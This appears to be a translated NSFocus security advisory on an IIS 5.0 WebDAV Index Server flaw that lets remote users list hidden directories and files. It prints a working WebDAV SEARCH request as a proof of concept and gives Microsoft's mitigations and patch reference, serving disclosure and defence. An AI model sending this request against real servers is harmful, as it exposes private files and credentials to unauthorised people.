iis| Index | Microsoft Microsoft IIS 5.0 Leak Index Directory vulnerability
Release Date: 2000-10-6
Renew Date: 2000-10-6
Affected systems: Microsoft IIS 5.0
+ Microsoft Windows NT 2000
Describe:
--------------------------------------------------------------------------------
If the index server in IIS 5.0 is allowed, remote users may view the entire root structure and all subdirectories because there is a flaw in the lookup implementation of WebDAV. Hidden directories, included files (*.inc), or other documents that are generally inaccessible in the normal web interface will be compromised by this vulnerability.
Successfully exploiting this vulnerability could lead to specific files that might contain sensitive information such as user names and passwords.
The index server in IIS 5.0 is prohibited by default, and only directories with the index attribute set are affected by this vulnerability.
<* Source: David Litchfield <dlitchfield@atstake.com> *>
Test program:
--------------------------------------------------------------------------------
Warning
The following procedures (methods) may be offensive for security research and teaching purposes only. Users are at risk!
Send the following request to the server:
search/http/1.1
Host:target
Content-type:text/xml
content-length:133
<?xml version= "1.0"?>
<g:searchrequest xmlns:g= "DAV:" >
<g:sql>
Select "Dav:displayname" from Scope ()
</g:sql>
</g:searchrequest>
--------------------------------------------------------------------------------
Suggestions:
Interim solution:
NSFocus recommends that you use the solution offered by Microsoft:
If you are not using the index Server (for example, there is nothing in your Web site that you need to find), disable or uninstall the service. or disable the option "Index this resource" for directories that contain sensitive information.
Vendor Patch:
Microsoft has released a Knowledge Base article detailing the solution to this problem, which can be found in the following locations:
http://www.microsoft.com/technet/support/kb.asp?ID=272079
Sino-Union Green Alliance translation finishing, without permission, may not reprint
Welcome to visit our site http://www.nsfocus.com/
The Alliance of the Green Alliance to give you security protection